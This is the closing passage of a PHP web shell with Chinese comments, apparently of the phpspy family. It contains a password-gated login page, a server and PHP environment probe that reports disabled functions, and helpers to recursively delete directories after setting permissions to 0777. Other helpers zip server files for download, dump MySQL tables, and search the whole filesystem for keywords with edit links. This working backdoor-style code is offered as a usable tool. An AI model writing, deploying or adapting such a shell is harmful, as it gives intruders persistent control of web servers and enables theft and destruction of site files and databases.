	20 => array("允许最大上传文件 upload_max_filesize",$upsize),
	21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"),
	22 => array("被禁用的函数 disable_functions",$dis_func),
	23 => array("phpinfo()",$phpinfo),
	24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
	25 => array("图形处理 GD Library",getfun("imageline")),
	26 => array("IMAP电子邮件系统",getfun("imap_close")),
	27 => array("MySQL数据库",getfun("mysql_close")),
	28 => array("SyBase数据库",getfun("sybase_close")),
	29 => array("Oracle数据库",getfun("ora_close")),
	30 => array("Oracle 8 数据库",getfun("OCILogOff")),
	31 => array("PREL相容语法 PCRE",getfun("preg_match")),
	32 => array("PDF文档支持",getfun("pdf_close")),
	33 => array("Postgre SQL数据库",getfun("pg_close")),
	34 => array("SNMP网络管理协议",getfun("snmpget")),
	35 => array("压缩文件支持(Zlib)",getfun("gzclose")),
	36 => array("XML解析",getfun("xml_set_object")),
	37 => array("FTP",getfun("ftp_login")),
	38 => array("ODBC数据库连接",getfun("odbc_close")),
	39 => array("Session支持",getfun("session_start")),
	40 => array("Socket支持",getfun("fsockopen")),
	);
	$tb->tableheader();
	echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
	$tb->tdbody('<b>查看PHP配置参数状况</b>','left','1','30','style="padding-left: 5px;"');
	$tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"');
	$tb->makehidden('do','viewphpvar');
	echo "</form>\n";
	$hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况');
	for ($a=0;$a<3;$a++) {
		$tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
?>
  <tr class="secondalt">
  <td>
  <table width="100%" border="0" cellpadding="0" cellspacing="0">
<?php
if ($a==0) {
	for($i=0;$i<=12;$i++) {
		echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
	}
} elseif ($a == 1) {
	for ($i=13;$i<=24;$i++) {
		echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
	}
} elseif ($a == 2) {
	for ($i=25;$i<=40;$i++) {
		echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
	}
}
?>
  </table>
  </td>
  </tr>
<?php
	}//for
	echo "</table>";
}//end phpenv
$tb->tableheader();
$tb->tdbody('');
$tb->tablefooter();
?>
</center>
</body>
</html>

<?php

/*======================================================
函数库
======================================================*/

// 登陆入口
function loginpage() {
?>
<style type="text/css">
input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
</style>
<table width="416" border="0" align="center" cellpadding="0" cellspacing="0">
<form method="POST" action="">
  <tr> 
  <td height="75" align="center">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="hidden" name="do" value="login">
<input type="submit" value="Login">
	</td>
  </tr>
  </form>
<!--此处放入记数器-->
  </table>

<?php
exit;
}//end loginpage()

// 页面调试信息
function debuginfo() {
	global $starttime;
	$mtime = explode(' ', microtime());
	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
	echo "Processed in $totaltime second(s)";
}

// 去掉转义字符
function stripslashes_array(&$array) {
	while(list($key,$var) = each($array)) {
		if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
			if (is_string($var)) {
				$array[$key] = stripslashes($var);
			}
			if (is_array($var))  {
				$array[$key] = stripslashes_array($var);
			}
		}
	}
	return $array;
}

// 删除目录
function deltree($deldir) {
	$mydir=@dir($deldir);
	while($file=$mydir->read())	{
		if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
			@chmod("$deldir/$file",0777);
			deltree("$deldir/$file");
		}
		if (is_file("$deldir/$file")) {
			@chmod("$deldir/$file",0777);
			@unlink("$deldir/$file");
		}
	}
	$mydir->close();
	@chmod("$deldir",0777);
	return (@rmdir($deldir)) ? 1 : 0;
}

// 判断读写情况
function dir_writeable($dir) {
	if (!is_dir($dir)) {
		@mkdir($dir, 0777);
	}
	if(is_dir($dir)) {
		if ($fp = @fopen("$dir/test.txt", 'w')) {
			@fclose($fp);
			@unlink("$dir/test.txt");
			$writeable = 1;
		} else {
			$writeable = 0;
		}
	}
	return $writeable;
}

// 表格行间的背景色替换
function getrowbg() {
	global $bgcounter;
	if ($bgcounter++%2==0) {
		return "firstalt";
	} else {
		return "secondalt";
	}
}

// 获取当前的文件系统路径
function getPath($mainpath, $relativepath) {
	global $dir;
	$mainpath_info     = explode('/', $mainpath);
	$relativepath_info   = explode('/', $relativepath);
	$relativepath_info_count = count($relativepath_info);
	for ($i=0; $i<$relativepath_info_count; $i++) {
		if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
		if ($relativepath_info[$i] == '..') {
			$mainpath_info_count = count($mainpath_info);
			unset($mainpath_info[$mainpath_info_count-1]);
			continue;
		}
		$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
	} //end for
	return implode('/', $mainpath_info);
}

// 检查PHP配置参数
function getphpcfg($varname) {
	switch($result = get_cfg_var($varname)) {
		case 0:
			return "No";
			break;
		case 1:
			return "Yes";
			break;
		default:
			return $result;
			break;
	}
}

// 检查函数情况
function getfun($funName) {
	return (false !== function_exists($funName)) ? "Yes" : "No";
}

// 压缩打包类
class PHPZip{
	var $out='';
	function PHPZip($dir)	{
		if (@function_exists('gzcompress'))	{
			$curdir = getcwd();
			if (is_array($dir)) $filelist = $dir;
			else{
				$filelist=$this -> GetFileList($dir);//文件列表
				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
			}
			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
			else chdir($curdir);
			if (count($filelist)>0){
				foreach($filelist as $filename){
					if (is_file($filename)){
						$fd = fopen ($filename, "r");
						$content = @fread ($fd, filesize ($filename));
						fclose ($fd);
						if (is_array($dir)) $filename = basename($filename);
						$this -> addFile($content, $filename);
					}
				}
				$this->out = $this -> file();
				chdir($curdir);
			}
			return 1;
		}
		else return 0;
	}

	// 获得指定目录文件列表
	function GetFileList($dir){
		static $a;
		if (is_dir($dir)) {
			if ($dh = opendir($dir)) {
				while (($file = readdir($dh)) !== false) {
					if($file!='.' && $file!='..'){
						$f=$dir .'/'. $file;
						if(is_dir($f)) $this->GetFileList($f);
						$a[]=$f;
					}
				}
				closedir($dh);
			}
		}
		return $a;
	}

	var $datasec  = array();
	var $ctrl_dir   = array();
	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
	var $old_offset = 0;

	function unix2DosTime($unixtime = 0) {
		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
		if ($timearray['year'] < 1980) {
			$timearray['year']  = 1980;
			$timearray['mon']   = 1;
			$timearray['mday']  = 1;
			$timearray['hours'] = 0;
			$timearray['minutes'] = 0;
			$timearray['seconds'] = 0;
		} // end if
		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
		($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
	}

	function addFile($data, $name, $time = 0) {
		$name   = str_replace('\\', '/', $name);

		$dtime  = dechex($this->unix2DosTime($time));
		$hexdtime = '\x' . $dtime[6] . $dtime[7]
		. '\x' . $dtime[4] . $dtime[5]
		. '\x' . $dtime[2] . $dtime[3]
		. '\x' . $dtime[0] . $dtime[1];
		eval('$hexdtime = "' . $hexdtime . '";');
		$fr = "\x50\x4b\x03\x04";
		$fr .= "\x14\x00";
		$fr .= "\x00\x00";
		$fr .= "\x08\x00";
		$fr .= $hexdtime;

		$unc_len = strlen($data);
		$crc   = crc32($data);
		$zdata = gzcompress($data);
		$c_len = strlen($zdata);
		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
		$fr  .= pack('V', $crc);
		$fr  .= pack('V', $c_len);
		$fr  .= pack('V', $unc_len);
		$fr  .= pack('v', strlen($name));
		$fr  .= pack('v', 0);
		$fr  .= $name;

		$fr .= $zdata;

		$fr .= pack('V', $crc);
		$fr .= pack('V', $c_len);
		$fr .= pack('V', $unc_len);

		$this -> datasec[] = $fr;
		$new_offset    = strlen(implode('', $this->datasec));

		$cdrec = "\x50\x4b\x01\x02";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x14\x00";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x08\x00";
		$cdrec .= $hexdtime;
		$cdrec .= pack('V', $crc);
		$cdrec .= pack('V', $c_len);
		$cdrec .= pack('V', $unc_len);
		$cdrec .= pack('v', strlen($name) );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('V', 32 );
		$cdrec .= pack('V', $this -> old_offset );
		$this -> old_offset = $new_offset;
		$cdrec .= $name;

		$this -> ctrl_dir[] = $cdrec;
	}

	function file() {
		$data  = implode('', $this -> datasec);
		$ctrldir = implode('', $this -> ctrl_dir);
		return
		$data .
		$ctrldir .
		$this -> eof_ctrl_dir .
		pack('v', sizeof($this -> ctrl_dir)) .
		pack('v', sizeof($this -> ctrl_dir)) .
		pack('V', strlen($ctrldir)) .
		pack('V', strlen($data)) .
		"\x00\x00";
	}
}

// 备份数据库
function sqldumptable($table, $fp=0) {
	$tabledump = "DROP TABLE IF EXISTS $table;\n";
	$tabledump .= "CREATE TABLE $table (\n";

	$firstfield=1;

	$fields = mysql_query("SHOW FIELDS FROM $table");
	while ($field = mysql_fetch_array($fields)) {
		if (!$firstfield) {
			$tabledump .= ",\n";
		} else {
			$firstfield=0;
		}
		$tabledump .= " $field[Field] $field[Type]";
		if (!empty($field["Default"])) {
			$tabledump .= " DEFAULT '$field[Default]'";
		}
		if ($field['Null'] != "YES") {
			$tabledump .= " NOT NULL";
		}
		if ($field['Extra'] != "") {
			$tabledump .= " $field[Extra]";
		}
	}
	mysql_free_result($fields);

	$keys = mysql_query("SHOW KEYS FROM $table");
	while ($key = mysql_fetch_array($keys)) {
		$kname=$key['Key_name'];
		if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
			$kname="UNIQUE|$kname";
		}
		if(!is_array($index[$kname])) {
			$index[$kname] = array();
		}
		$index[$kname][] = $key['Column_name'];
	}
	mysql_free_result($keys);

	while(list($kname, $columns) = @each($index)) {
		$tabledump .= ",\n";
		$colnames=implode($columns,",");

		if ($kname == "PRIMARY") {
			$tabledump .= " PRIMARY KEY ($colnames)";
		} else {
			if (substr($kname,0,6) == "UNIQUE") {
				$kname=substr($kname,7);
			}
			$tabledump .= " KEY $kname ($colnames)";
		}
	}

	$tabledump .= "\n);\n\n";
	if ($fp) {
		fwrite($fp,$tabledump);
	} else {
		echo $tabledump;
	}

	$rows = mysql_query("SELECT * FROM $table");
	$numfields = mysql_num_fields($rows);
	while ($row = mysql_fetch_array($rows)) {
		$tabledump = "INSERT INTO $table VALUES(";

		$fieldcounter=-1;
		$firstfield=1;
		while (++$fieldcounter<$numfields) {
			if (!$firstfield) {
				$tabledump.=", ";
			} else {
				$firstfield=0;
			}

			if (!isset($row[$fieldcounter])) {
				$tabledump .= "NULL";
			} else {
				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
			}
		}

		$tabledump .= ");\n";

		if ($fp) {
			fwrite($fp,$tabledump);
		} else {
			echo $tabledump;
		}
	}
	mysql_free_result($rows);
}

class FORMS {
	function tableheader() {
		echo "<table style=\"width:775px;border: #3A6EA5 1px solid;\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
	}

	function headerform($arg=array()) {
		global $dir;
		if ($arg[enctype]){
			$enctype="enctype=\"$arg[enctype]\"";
		} else {
			$enctype="";
		}
		if (!isset($arg[method])) {
			$arg[method] = "POST";
		}
		if (!isset($arg[action])) {
			$arg[action] = '';
		}
		echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
		echo "  <tr>\n";
		echo "  <td>".$arg[content]."</td>\n";
		echo "  </tr>\n";
		echo "  </form>\n";
	}

	function tdheader($title) {
		global $dir;
		echo "  <tr class=\"firstalt\">\n";
		echo "	<td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">返回</a>]</b></td>\n";
		echo "  </tr>\n";
	}

	function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
		if ($bgcolor=='2') {
			$css="secondalt";
		} elseif ($bgcolor=='1') {
			$css="firstalt";
		} else {
			$css=$bgcolor;
		}
		$height = empty($height) ? "" : " height=".$height;
		$colspan = empty($colspan) ? "" : " colspan=".$colspan;
		echo "  <tr class=\"".$css."\">\n";
		echo "	<td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
		echo "  </tr>\n";
	}

	function tablefooter() {
		echo "</table>\n";
	}

	function formheader($action='',$title,$target='') {
		global $dir;
		$target = empty($target) ? "" : " target=\"".$target."\"";
		echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
		echo "  <tr class=\"firstalt\">\n";
		echo "	<td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">返回</a>]</b></td>\n";
		echo "  </tr>\n";
	}

	function makehidden($name,$value=''){
		echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
	}

	function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
		$css = ($css == 'input') ? " class=\"input\"" : "";
		$input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
		return $input;
	}

	function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
		$textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
		return $textarea;
	}

	function formfooter($over='',$height=''){
		$height = empty($height) ? "" : " height=\"".$height."\"";
		echo "  <tr class=\"secondalt\">\n";
		echo "	<td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"确定\"></td>\n";
		echo "  </tr>\n";
		echo " </form>\n";
		echo $end = empty($over) ? "" : "</table>\n";
	}

	function makeselect($arg = array()){
		if ($arg[multiple]==1) {
			$multiple = " multiple";
			if ($arg[size]>0) {
				$size = "size=$arg[size]";
			}
		}
		if ($arg[css]==0) {
			$css = "class=\"input\"";
		}
		$select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
		if (is_array($arg[option])) {
			foreach ($arg[option] AS $key=>$value) {
				if (!is_array($arg[selected])) {
					if ($arg[selected]==$key) {
						$select .= "<option value=\"$key\" selected>$value</option>\n";
					} else {
						$select .= "<option value=\"$key\">$value</option>\n";
					}

				} elseif (is_array($arg[selected])) {
					if ($arg[selected][$key]==1) {
						$select .= "<option value=\"$key\" selected>$value</option>\n";
					} else {
						$select .= "<option value=\"$key\">$value</option>\n";
					}
				}
			}
		}
		$select .= "</select>\n";
		return $select;
	}
}

function find($path) //查找关键词
{
	global $oldkey,$type,$type2,$endline,$beline;
	if(is_dir("$path")){
		$tempdir=opendir("$path");
		while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue;  find("$path/$f");}
		closedir($tempdir);
	}else{
		if(filesize("$path")){
			$fp=fopen("$path","r");
			$msg=fread($fp, filesize("$path"));
			fclose($fp);
			if(strpos($msg, $oldkey) !== false) {
				$dir = dirname($path);
				$file = basename($path);
				if($type=="list"){
					$mymsg = explode("\n",$msg);
					$long = count($mymsg);
					$tmp = explode($oldkey,$msg);
					$tmp = explode("\n",$tmp[0]);
					$first = count($tmp);
					$end = "[".$first."/".$long."]";
				}
				if($type2=="getpath"){
					$get = explode($oldkey,$msg);
					$get = strlen($get[0]);
					if(isset($beline)){
						$get = $get-$beline;
					}
					$getpath = htmlspecialchars(substr($msg, $get, $endline));
					$getpath = "title = \"".$getpath."\"";
				}
				echo "<span class=\"redfont\" $getpath>找到:$dir/$file</span> |<a href=\"?action=editfile&dir=$dir&editfile=$file\" target=\"_blank\">view+edit</a> | $end <br>";
			}
		}
	}
}
?>